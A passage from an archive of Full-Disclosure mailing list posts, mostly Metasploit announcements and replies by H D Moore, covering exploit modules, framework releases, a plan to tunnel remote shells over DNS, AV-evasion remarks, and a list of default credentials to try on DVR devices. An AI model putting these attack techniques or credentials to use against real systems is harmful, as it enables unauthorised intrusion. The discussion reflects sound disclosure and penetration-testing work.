another version of this exploit that uses a more traditional exploit
method, but there doesn't seem to be much point in releasing it now.

ie_createobject:
 - This exploit module is capable of exploiting any "generic"
 CreateObject vulnerability in an ActiveX control. The current targets
 allow it to exploit MS06-014 and various controls that don't seem to be
 documented or often found vulnerable. This exploit uses the PE "wrapper"
 to download a generated executable containing the selected payload.

eiq_license:
 - This exploit module is one of many for the recent EIQ vulnerabilities.
I pushed this one out because of the amount of work the author put into
it and the lack of cleanup I had to do before including it. The rest of
the EIQ modules will be added and merged as I get time. Thanks again to
everyone who submitted modules for these issues.

realvnc_client:
 - This exploits an older client-side vulnerability in the VNC viewer for
Windows. Thanks again to MC for writing this up.

securecrt_ssh1:
 - This exploits an older client-side vulnerability in SecureCRT. Another
great module provided by MC.

mercury_imap:
 - This exploit module is capable of exploiting the RENAME command
overflow found in older versions of the Mercury IMAP software. Yet
another exploit by MC.

A dozen small bug fixes, new targets, and cosmetic improvements were
included with this update. Thanks to David Maciejak for sending in many
of these and having the patience to deal with my update schedule.

Matt Miller (skape) tracked down a long-time bug in the 'EXE' output mode
of msfpayload. The template executable had an invalid stack size set,
which caused all DLL Inject payloads to crash when initialized from
inside the PE template. This fix should allow you to use the vncinject
and metepreter payloads with the msfpayload X mode (standalone exe).

The msfpayload tool now has a javascript output format. Simply pass 'J'
 as the output mode of msfpayload to get an unescape()-ready string.

The next 3.0 beta should be ready sometime next week. If I get over my
fear of being owned via subversion, the actual source code respository
for 3.0 will also become public.

Enjoy!

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-10 Thread H D Moore 
At some point, depending on time. Feel free to add one :-)

-HD

On Thursday 10 August 2006 06:03, David Taylor wrote:
> Hi HD,
>
> Do you plan on building a 'check' feature into this in the future?  I
> find those to be very handy in scripting checks on our systems.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-11 Thread H D Moore 
The DLLs for XP SP2 and 2003 SP1 were compiled with Visual Studio's stack 
protection flag (/GS). This prevents a standard return address overwrite 
from working. The wcscpy() method everyone is using in their exploits is 
also blocked by another change in how the compiler orders and passes 
arguments.  The standard way to bypass /GS is to use a SEH ptr overwrite, 
but so far, it doesn't seem possible to reach a SEH ptr with the 
overflow, when using the PathCanonicalize method. 


On Friday 11 August 2006 08:40, Brendan Dolan-Gavitt wrote:
> Is there any technical reason that an exploit cannot be developed
> against XP SP2 and Server 2003 SP1? Or is this only a limitation of
> the current Metasploit exploit?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] JavaScript get Internal Address (thanks to DanBUK)

2006-08-12 Thread H D Moore 
Hello,

I worked on something similar, it uses Java in the same way, but also uses 
a custom DNS server to obtain even more information:

Demo:
http://metasploit.com/research/misc/decloak/

Code:
http://metasploit.com/research/misc/decloak/HelloWorld.java

-HD

On Saturday 12 August 2006 03:55, pdp (architect) wrote:
> http://www.gnucitizen.org/projects/javascript-address-info
> http://f-box.org/~dan/jstest.html
>
> The following technique was brought to me by DanBUK
> (http://f-box.org/~dan/). Dan managed to find the internal IP address
> of the visiting client by establishing a socket between local host and
> the remote web server. Upon success the socket populates its structure
> with all kinds of useful information among some of which are the
> internal IP address and the hostname.
>
> http://www.gnucitizen.org/projects/javascript-address-info/addressinfo.
>js
>
> This technique requires Java, however I think that It should be
> possible to achieve similar result by invoking special ActionScript
> methods from Flash.
>
> POC can be found on the url above.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: Re[2]: [Full-disclosure] JavaScript get Internal Address (thanks to DanBUK)

2006-08-12 Thread H D Moore 
On Saturday 12 August 2006 12:16, Thierry Zoller wrote:
> OHoh, when can we expect a DNS tunnel, tunneling a shell through your
> DNS requests and DNS answers ? :) A nice remote shell thorugh dns
> tunnel over XSS. LOL :)

Heh. I actually have a plan for doing that :-)

1) Create a metasploit payload for communicating with shell/meterpreter 
via DNS queries and replies. This will not be a 'small' payload by any 
means, but should be feasible for all DCERPC and browser bug exploits.

2) Develop a custom DNS server for *.msf.metasploit.com

3) Provide a registration page where you can request a username/password

4) Provide a DNS sub-domain server in metaspoit 3.0. This attacker will 
connect to the metasploit.com web site, post the user/pass, and ask for a 
unique sub-domain that points back it its own address. This can be 
automated by the payload handler.

5) Select a DNS payload, select an exploit, exploit the target system. The 
payload is configured to "talk" to *.uniqueId.msf.metasploit.com, which 
actually runs on the system running the metasploit console.

6) The payload runs, the client resolves the NS record from our server, 
gets redirected to the attacking metasploit console, and communication 
starts.

7) Profit!


The problems with this are:

* Privacy concerns regarding the initial DNS request to msf.metasploit.com 
for the NS record of the attacker. Technically, this could violate a NDA 
if used on a penetration test.

* The framework console would need to bind to port 53 (r00t on unix) and 
be accessible from the internet.

* Need to develop a DNS service running in Ruby. Another time requirement.

* It may not be that useful, but it does seem like a fun hack. With any 
luck, this can be accomplished using the built-in name resolution API in 
windows/unix/etc.

* Really easy to signature if it always uses *.metasploit.com requests.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NT4 worm

2006-08-30 Thread H D Moore 
The exploit for NT 4.0 is *exactly* the same packet as the one you would 
also use on Windows 2000. I am suprised that this is considered a "NT 4" 
worm and not a "Windows 2000 (+NT 4.0)" worm. Is something specific about 
the exploit they use that prevents it from working on Windows 2000?

-HD

On Wednesday 30 August 2006 10:11, Juha-Matti Laurio wrote:
> Are the machines you have experience especially NT4.0 machines?
> It appears that one of the PoC's (public on Monday 28th Aug) lists the
> following information: "Systems Affected:
> *  Microsoft Windows 2000 SP0-SP4
> *  Microsoft Windows XP SP0-SP1
> *  Microsoft Windows NT 4.0"
>
> but reportedly it is tested against XPSP1 and W2KSP4 systems.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] BH/DC: Tactical Exploitation Materials

2007-08-09 Thread H D Moore 
At Black Hat 2007 and Defcon 15, Valsmith and I gave a talk 
entitled "Tactical Exploitation". This talk introduced a tactical 
approach to penetration testing that does not rely on exploiting known 
vulnerabilities. During the talk, we used a combination of new tools and 
lesser-known techniques to walk through the process of compromising a 
target network. The materials for this talk are now online, including the 
slides, white paper, and videos. These materials can be found online at:
 - http://metasploit.com/confs/

For those who missed both the talks or couldn't stay for all of one, the 
white paper does a good job of covering the things we discussed:
 - http://metasploit.com/confs/blackhat2007/tactical_paper.pdf

Most of the exploits and tools can be found in the trunk version of the 
Metasploit Framework. These will be merged into the stable tree over the 
next week or so (along with some HOWTOs on the Metasploit Blog). To grab 
the latest version of the Metasploit Framework, you can use the following 
command:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3-trunk
$ ./msf3-trunk/msfconsole

Thanks to everyone who came to our talks!

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BH/DC: Tactical Exploitation Materials

2007-08-09 Thread H D Moore 
Good point! I didn't like the intro that much, it will be revisted in the 
next revision :-) Thanks for the feedback!

-HD

On Thursday 09 August 2007 19:24, Hernan Ochoa wrote:
> The only thing I would argue is the concept that your paper is actually
> 'INTRODUCING a tactical approach to penetration testing',  'Revisiting'
> would be much more accurate in my opinion. I don't think your approach
> is new. Having said that, I do think, like I said, that your paper
> comes at the right time because the proliferation of 'explotation
> frameworks' and their (commonly) direct association with 'penetration
> testing' can  mislead people to believe that penetration testing is
> only that. So congrats again :).

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cracking the iPhone (5 article series)

2007-10-22 Thread H D Moore 
The last part of my iPhone-related blog entries was posted last night. The 
first article discusses the architecture and provides some useful 
shellcode for already-modified phones. 
 
http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe-yours.html

The second article discusses the libtiff exploit and includes a link to a 
modified version of the weasel debugger. 

http://blog.metasploit.com/2007/10/cracking-iphone-part-1.html

The third article steps through the entire libtiff exploit development 
process, using an updated version of the debugger. 

http://blog.metasploit.com/2007/10/cracking-iphone-part-2.html

The fourth article describes a different approach to exploiting the 
libtiff vulnerability that is much more reliable across a wider range of 
applications. 

http://blog.metasploit.com/2007/10/cracking-iphone-part-21.html

The fifth and final article walks through the process of developing a 
payload capable of writing arbitratry executables to disk and executing 
them. The final article closes with a stand-alone shell that can be used 
to gain remote, interactive access to unmodified iPhones, and 
demonstrates how to use this shell to apply the third-party libtiff 
patch.

http://blog.metasploit.com/2007/10/cracking-iphone-part-3.html

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VML Exploit vs. AV/IPS/IDS signatures

2006-09-26 Thread H D Moore 
Nice work Aviv! All of these methods, along with a few extras, are 
implemented in the Metasploit 2.6 version of this module. Last I checked, 
not a single AV or IPS could pick it up. This module should work on every 
version and service pack of Windows.

http://metasploit.com/projects/Framework/exploits.html#ie_vml_rectfill

-HD

On Tuesday 26 September 2006 09:04, avivra wrote:
> I've used 5 simple methods, trying to evade being detected by the
> signature: 1) I've replaced the location where EIP should jump when the
> exploit is activated, with a different valid address.
> 2) I've replaced the VML element from "rect" with one of the other VML
> elements. 3) I've replaced the payload with a different valid shell
> code. 4) I've replaced the namespace key with a random key.
> 5) A combination of all of the above.
>
> Please note that when I changed the code using any of the methods, the
> exploit still worked.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework 2.7 Released

2006-10-30 Thread H D Moore 
The Metasploit Framework is an advanced open-source exploit development 
platform. The 2.7 release includes three user interfaces, 157 exploits 
and 76 payloads.The Framework will run on any modern operating system 
that has a working Perl interpreter. The Windows installer includes a 
slimmed-down version of the Cygwin environment. 

Windows users are encouraged to update as soon as possible. A number of 
improvements were made that should make the Windows experience a little  
less painful and a lot more reliable. All updates to 2.6 have been rolled 
into 2.7, along with some new exploits and minor features. 

This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.7.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.7.exe

The latest version can be pulled directly from Subversion:
 $ svn co http://metasploit.com/svn/framework2/trunk/

A demonstration of the msfweb interface is running live from:
  - http://metasploit.com:5/
 
This may be the LAST 2.x version of the Metasploit Framework. All
development resources are now being applied to version 3.0. More
information about version 3.0 can be found online at:
  - http://metasploit.com/projects/Framework/msf3/
  
Exploit modules designed for the 2.2 through 2.6 releases should maintain
compatibility with 2.7. If you run into any problems using older
modules with this release, please let us know.

Donations to the Metasploit Project are now tax deductible for US 
entities. Please see the donations web page for more information.
 - http://metasploit.com/donate.html

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html

We would like to thank the community in general and the Metasploit
contributors in particular for their support of the project.

Changes since the 2.6 release:

windows:
 * The Windows installer and Cygwin environment have been updated
 * The console size has been greatly improved under Windows
 * Large payloads (meterpreter/vncinject) are much more reliable

msfupdate:
 * The msfupdate tool has been replaced with Subversion
 * All Subversion features (branching, diffs, etc) are supported

meterpreter:
 * The SAM extension now works against NX/DEP systems.  

exploits:
 * Minor cosmetic improvements to many modules
 * 14 new exploits added since 2.6 was released

payloads:
 * The payload staging system is more reliable for large payloads
 * Size reductions and reliability improvements

Enjoy!

- The Metasploit Staff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework 3.0 Beta 3 Released

2006-10-30 Thread H D Moore 
The Metasploit Framework is an advanced open-source exploit development 
platform. The 3.0 tree represents a complete rewrite of the 2.0 codebase 
and provides a scalable and extensible framework for security tool 
development. The 3.0 Beta 3 release includes support for exploit 
automation[1], 802.11 wireless packet injection[2], and kernel-mode 
payloads[3].

Windows users are now presented with a RXVT console and an updated Cygwin 
environment, which greatly improves the usability of the 3.0 interface on 
the Windows platform. 

The Metasploit Web Interface is still in development, but this release 
includes a preview of what the end functionality will look like. The web 
interface provides a "webtop" interface for interacting with the 
framework and uses aynschronous javascript to provide live searching. A 
early version of Metasploit IDE is also included with the web interface.

Downloads for all platforms can be found here:
 - http://metasploit.com/projects/Framework/msf3/#download
 
The latest version can be pulled directly from Subversion:
 $ svn co https://metasploit.com/svn/framework3/trunk/

Unix users may need to install the openssl zlib and dl ruby modules for 
the Framework to load. If you are using Ubuntu you will need to run the 
following commands:

# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby

Unix users who wish to try the new web interface will need to install 
the 'rubygems' package and the 'rails' gem. Please see 
www.rubyonrails.com for more information and platform-specific 
installation instructions.

Users of other distributions or Unix flavors may want to grab the latest 
version of ruby from www.ruby-lang.org and build it from source. We 
highly recommend using Ruby version 1.8.4 or newer.Windows users will 
need to exit out of any running Cygwin-based applications before running 
the installer or using the Framework. The old 3.0 installation should be 
uninstalled prior to installing and using this version.

The release packages include Subversion repository information allowing 
you to synchronize your Beta 3 installation with the live development 
tree. The Windows installer includes a "MSFUpdate" menu item that uses 
Subversion to download the latest updates.Unix users will need to install 
the Subversion client change into the framework directory and 
execute 'svn update'.

On Unix systems, Subversion will complain about the self-signed 
certificate in use at metasploit.com. Please verify that the fingerprint 
matches the one below before accepting it:

===
- Hostname: metasploit.com
- Valid: from Jun 3 06:56:22 2005 GMT until Mar 31 06:56:22 2007 GMT
- Issuer: Development The Metasploit Project San Antonio Texas US
- Fingerprint: 1f:a2:8e:ad:14:57:53:75:b7:ab:de:67:e8:fa:17:49:76:f2:ee:ad
===

Enjoy!

- The Metasploit Staff

1. http://tinyurl.com/yadb4p
2. http://www.eweek.com/article2/0,1895,2040914,00.asp
3. http://tinyurl.com/yx5q79

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fun with wireless cards...

2006-11-01 Thread H D Moore 
Lorenzo's Kernel Fun project:
http://kernelfun.blogspot.com/

The Metasploit 3 exploit module:
http://metasploit.com/svn/framework3/trunk/modules/auxiliary/dos/wireless/daringphucball.rb

Media coverage so far:
http://www.securityfocus.com/brief/344
http://www.darkreading.com/document.asp?doc_id=109535&WT.svl=news1_1
http://blog.washingtonpost.com/securityfix/2006/11/exploit_released_for_unpatched_1.html

More to come :-)

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft patches the WMI Object Broker bug

2006-11-01 Thread H D Moore 
http://www.microsoft.com/technet/security/advisory/927709.mspx

The Metasploit 2 module (ie_createobject)[1] has been exploiting this bug 
since it was released in August. Glad to see they finally noticed.

Thanks to Aviv for noticing / sending me the link.

-HD

1. http://metasploit.com/projects/Framework/exploits.html#ie_createobject

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft patches the WMI Object Broker bug

2006-11-01 Thread H D Moore 
Doh. I read too quickly. Ryan Naraine pointed out that there is no patch, 
the advisory just confirms that people are exploiting it.

-HD

On Wednesday 01 November 2006 13:21, H D Moore wrote:
> http://www.microsoft.com/technet/security/advisory/927709.mspx

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Wireless fun!

2006-11-13 Thread H D Moore 
Shiny new (remote) kernel-mode exploits for Metasploit 3:

http://kernelfun.blogspot.com/2006/11/mokb-13-11-2006-d-link-dwl-g132.html
http://kernelfun.blogspot.com/2006/11/mokb-11-11-2006-broadcom-wireless.html

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DVR (Digital Video Recorders) + hack?

2007-02-09 Thread H D Moore 
Try using root:root, root:admin, admin:admin, and radmin:radmin via telnet 
and ssh for these systems:

http://www.linuxforums.org/forum/other-distributions/63848-help-linux-version.html

-HD


On Friday 09 February 2007 05:22, Mark Sec wrote:
> any1 have experience over these "boxes"?, we have many flavors, we
> looking more information about to "howto" hack the firmware, app or
> ports by default (80.23,22), we found a DoS over port 80...
>
> any1 with more information?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/